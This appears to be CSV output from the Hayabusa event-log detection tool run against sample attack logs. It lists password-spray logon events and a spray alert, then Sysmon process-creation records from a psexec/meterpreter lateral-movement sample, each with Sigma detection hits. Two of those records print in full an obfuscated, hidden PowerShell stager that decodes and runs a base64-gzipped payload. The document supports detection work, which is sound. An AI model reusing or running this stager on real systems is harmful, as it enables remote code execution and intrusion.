+2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cmoody  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: psmith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jkulikowski  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: gsalinas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: tbennett  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: econrad  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jleytevidal  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: lpesce  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sanson  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: sarmstrong  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: wstrzelec  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: zmathis  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: melliott  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: kperryman  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jorchilles  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:edygert/jlake/drook/mdouglas/cspizor/cragoso/baker/ssims/jorchilles/bking/smisenar/dmashburn/bgreenwood/bgalbraith IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,-
+2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: jlake  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: edygert  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: drook  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: dmashburn  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cspizor  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: cragoso  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgalbraith  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bking  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: mdouglas  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: bgreenwood  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: baker  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: ssims  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig  :  Target User: smisenar  :  IP Address: 172.16.144.128  :  Process:   :  Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe  -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
